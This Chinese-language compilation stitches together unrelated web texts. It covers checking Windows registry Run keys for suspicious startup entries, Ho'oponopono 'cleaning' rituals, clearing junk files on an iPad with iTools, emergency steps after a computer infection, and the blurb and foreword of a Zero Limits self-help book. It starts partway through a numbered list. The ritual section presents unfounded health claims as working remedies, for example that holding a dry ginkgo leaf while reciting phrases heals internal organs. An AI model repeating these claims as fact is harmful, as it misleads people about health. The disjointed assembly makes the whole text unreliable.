3、检查注册表启动项： HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunonceEx HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices 在以上表项中检查是否有可疑启动项目，如果有，针对启动项目中提供的路径查找文件，也可根据这些文件名查找其它相关注册表项； 查找文件后，可手动删除可疑表项，或通过使用HijackThis等工具清理注册表启动项； 注意：删除前先导出备份注册表，以备删错重新导入。

零极限各种清理方法

零极限各种清理方法 一、听觉清理： ①就是那人人都会来两句的-----“对不起，请原谅我，谢谢你，我爱你”，可以对任何人任何事进行清理，号称万能清理法，而这其中尤以代表放下的-----谢谢你，和代表感恩的-----我爱你，功能与效果最强。 ②冰蓝ice blue，这个工具很优秀，效果很好，清理你生理和心理上的创伤，那么当你沮丧不安受伤，感到委屈时，就冰一冰吧。另外当沮丧不安、压力大或身体受伤时，不断的在心理说出这个字，可帮助消除痛苦，让自己平静下来。 ③开灯light swich，象征关掉程式，打开光明。在回应别人说话前，先默念一下，开灯，开灯，大多数的情况，可以说出对方真正需要听到的话。 ④捕蝇纸flypaper，清理与你关系比较密切的人，比如恋人，朋友，亲人，中国的人际关系较老外的要复杂的多，所以平时多捕捕吧，在你吵架打架发怒时，就用这招吧。在心理默念这个字。 ⑤露珠(dewdrop)，難過或恐懼某一件事時，反覆的默誦這個字。 二、视觉清理： ①就是那个ceeport的贴图了，看着就可以清了，看时，最好心里默念四句真言，加强效果，心中平衡。 ②冰蓝的图片了，就是那座冰山，也是看的，看时，默念冰蓝就ok了。 三、味觉清理： ①那就是你平时喝的白开水或者外面太阳晒成的蓝色阳光水了，你可以在里面加以些柠檬汁啊，因为夏威夷很热的，有大大的太阳，而柠檬就是太阳，水喝完了，你也就被太阳清理掉了。 ②引诱你口水直流你的草霉和蓝霉，味道真好，可以清爽一整天了，当你厌食，食欲不振，头脑发热，嘴唇发干，那就大吃几颗吧。 ③巧克力，好美味的，尤其是上面带草霉蓝霉的那种，会让你开心二十四个小时的，用法同上。还有一点就是饭前饭后半小时之内不能吃。 四、触觉清理： ①橡皮擦(eraser tool)，用鉛筆尾部的橡皮擦來清理。用這塊橡皮去敲擊你想要清理的東西。如果對身體的哪一個部位不滿意，例如大腿，就常常用橡皮去輕敲它，並對大腿說，對不起、請原諒我、謝謝你、我愛你。 ②找个银杏叶（特别提醒，是银杏的枯叶），左手大姆指和食指轻轻捏着，心中默念四句真言，可清理一些关于心肝脾肺胃等内里器官方面的疾病。 Ceeport的意思：Clean, Erase, Erase, as you return to the Port. C-清理E-消除E-消除Port-港口(回归零的状态) 也就是指「当心中的记忆被消除净空时,就能拨云见日,回到自己探求的港口」

iTools要如何清理系统垃圾的方法

iTools要如何清理系统垃圾的方法 随着科学技术的发展，由于苹果无法直接打开系统文件夹，也没有一个好的清理系统垃圾的办法，只能看着iPad mini越来越卡。下面是小编为大家整理的关于iTools要如何清理系统垃圾的方法，一起来看看吧! iTools要如何清理系统垃圾的方法 1、用iTools“清理垃圾”功能直接清理。连接设备，进入iTools高级功能“清理垃圾”，iTools会自动对系统冗余的垃圾进行清理，耐心等待完成即可哦。 若是仍旧担心清理的不干净，不妨给系统来一个彻底大检查，手动查找清理一下吧。 2、【/User/Media/APPlicationArchives/】目录下可以安全删除，里面是删除出错的软件压缩包。

3、【/User/Media/PublicStaging】可以找到安装失败的应用程序冗余文件。 4、想要内存更大的话，还有一个方法，在iTools的应用程序“文档管理”中的打开LibraryCaches，把Caches文件夹中的记录删除(名为Cache.db)。 Ps：Documents里的文件是用户文件。不建议删除。但一些图片和访问记录删除掉也是可以达到清理内存的功效的。 5、如果你的ipad mini越狱了，也用过91cydia等其他工具，Cydia,91助手,手工安装都放在/private/var/stash/Applications文件夹，这里的文件夹名称都一目了然。找到你要的软件垃圾，直接删除之。前提是你在iPad mini上已经删除一遍了，但是没删除干净的情况，也就是你在这些文件夹里发现了一个你已经删除的软件，但是还留有它的文件夹。 6、进入iTools文件系统，【越狱系统—/tmp】新近发现的iTunes同步或删除失败的文件，以install_greenmile.XXXXXX类型命名的文件夹，删。

(完整版)计算机中毒后的五大紧急处理措施

计算机中毒后的五大紧急处理措施 现在虽然有众多的杀毒软件和防火墙供大家作为电脑的保护，但新病毒和木马，加上黑客人工的入侵方式，电脑中毒的情况还是很普遍。尤其是上网的用户，一不留意就会中招。如何防止中毒的技巧文章，大家已经看得很多了。那么万一中毒了，该如何处理呢?下面就谈谈中毒后的一些紧急处理措施。 一、正在上网的用户，发现异常应首先马上断开连接 如果你发现IE经常询问你是否运行某些ActiveX控件，或是生成莫明其妙的文件、询问调试脚本什么的，一定要警惕了，你可能已经中招了。典型的上网被入侵有两种情况： 1、是浏览某些带恶意代码的网页时候被修改了浏览器的默认主页或是标题，这算是轻的;还有就是遇到可以格式化硬盘或是令你的Windows不断打开窗口，直到耗尽资源死机。这种情况恶劣得多，你未保存和已经放在硬盘上的数据都可能会受到部分或全部的损失。 2、是黑客的潜在木马发作，或是蠕虫类病毒发作，让你的机器不断地向外界发送你的隐私;或是利用你的名义和邮件地址发送垃圾，进一步传播病毒;还有就是黑客的手工入侵，窥探你的隐私或是删除破坏你的文件。

处理办法：马上断开连接，这样能将自己的损失降低的同时，也避免了病毒向更多的在线电脑传播。请先不要马上重新启动系统或是关机，进一步的处理措施请参看后文。 二、中毒后，应马上备份转移文档和邮件等 中毒后运行杀毒软件清除是不在话下的了，但为了防止杀毒软件误杀或是删掉你还处理完的文档和重要的邮件，你应该首先将它们转移备份到其他储存媒体上。有些长文件名的文件和未处理的邮件要求在Windows下备份，所以第一点这里笔者建议您先不要退出windows，因为病毒一旦发作，可能就不能进入Windows了。 不管这些文件是否带毒了，你都应该备份，用标签纸标记为待查即可。因为有些病毒是专门针对某个杀毒软件设计的，一运行就会破坏其他的文件，所以先备份是以防万一的措施。等你清除完硬盘内的病毒后，再来慢慢分析处理这些额外备份的文件较为妥善。 三、需要干净的DOS启动盘和DOS下面的杀毒软件 到现在，就应该按很多杀毒软件的标准手册去按步就班地做，即关机后冷启动，用一张干净的DOS启动盘引导是不能少的了;另外由于中毒后可能Windows已经被破坏了部分关键文件，会频繁地非法操作，所以Windows下的杀毒软件可能会无法运行。所以请你也准备一个DOS下面的杀毒软件来以防万一。

零极限生活篇

内容简介 ◎外在不存在任何东西，就只有你和你的念头。 ◎你是毫无负罪感的百分之百负责的人。 ◎当一扇门关上了，就会有另一扇们自动打开。 ◎在生命中的每一个挑战背后，都蕴藏着光。 ◎只有你能让自己自由，这种力量只能从你自身释放出来。 ◎更多的反对与异议，等同于更多的祝福。 ◎当你改变了，所有的事也都会改变。 ◎平静从你开始。 作者简介 [美] 玛贝尔·卡茨（Mabel Katz） 在国际上，玛贝尔被誉为在远古的“荷欧波诺波诺”问题解决方法领域最为重要的作家。 玛贝尔的激情在于启发我们觉醒于自己的真正身份，帮助我们认识到改变生活并不需要依靠任何外在的人和事，这个力量就在我们心中。玛贝尔在世界各地教导“荷欧波诺波诺”这个古老的夏威夷疗法。继《最简单的方式》出版之后，玛贝尔很快便拥有了自己的广播和电视节目，并出版了《零极限：生活篇》。现在，她在世界各地举行工作坊研讨会，并广受欢迎。 在过去的12年中，玛贝尔紧密地跟随自己的老师修?蓝博士学习夏威夷疗法。目前，她已成为国际公认的最有权威的夏威夷疗法教师之一，并被誉为在远古的“荷欧波诺波诺”问题解决方法领域最为重要的作家。玛贝尔语言精练、风格独特，学生遍布世界各地，她的书也已被翻译成多国文字在世界各地传播。 目录 推荐序徐苡榛 推荐序阿希卡 推荐序伊贺列卡拉?修?蓝博士 前言 第一章你是完美的 第二章记忆 第三章清除 第四章“谢谢你”的力量 第五章心智不是用来“知道”的 第六章凡事起于一念 第七章再次成为孩子 第八章原谅 第九章期待

第十章放下 第十一章评断 推荐序 你来了，你走了，都很美。 你说话，你沉默，都很真。 我爱你的方式，是让你回到你自己。 这些话是我对自己说的。生命是一段学习爱的历程，每一刻到我们身旁的人，都在为我们提供学习的角色，给予爱或是接受爱，但许多人也在这样的过程中感到无力及受到伤害，因而开始恐惧这个历程，更让自己关起心门不敢再去感受爱。是什么造成了这样的局面，让人与人之间有了道无形的墙。比如，当人们新认识一个朋友时，总是几经衡量与观察后才敢放心大胆地交往。向我咨询的个案经常会和我说，他记不起快乐的时光，或是觉得受到的伤害如此之大，怎么可能再去爱人？我想这些全是记忆的因素！ 记忆是一种有意识或是无意识的能量，有个别的记忆也有集体的记忆，如《零极限》那本书中所说，每秒中进入大脑的讯息，有许多是我们没有察觉的，而那些讯息在影响着我们对眼前发生的事的看法及评断，当有了评断就有了对错好坏的分别，而这些也是我们无法敞开心去爱的最重要的原因。 归零真的是很重要的课题，当我们用记忆的框架去看因缘，实在是不公平的，每一个人都是独特的，不同于其他人，每一刻的状态也都在变化，如果我们用以往的经验法则去判断事情的发展，就会让原本的流动路线产生变形，失去它原有的美，这些都是在让我们学习不断归零去看，如果可以把头脑的记忆放下，听从内在真实的声音，在当下找到最自在的位置与身边的人、事、物相处，并用爱的眼光去看，那心中的平静将令人非常喜悦！ 我随时提醒自己做这样的练习，既为人，就有人的情感及欲望，这些也是真实的感受，留意感受，学习时时清理，爱发生的一切，信任宇宙的安排都在成就每个人学习爱的历程，我们也在过程中，将自己的能量留在宇宙的量子世界里。若是愈多人能用归零的心去爱，那宇宙的能量将愈趋平静。所以，我真的感受到一个真理，平静要从归零去爱开始。机缘巧合，我曾在上海与本书的作者会面，当时她所呈现的状态，我想也正是这个真理的最佳写照。 徐苡榛 2011年8月16日于上海宇宙心光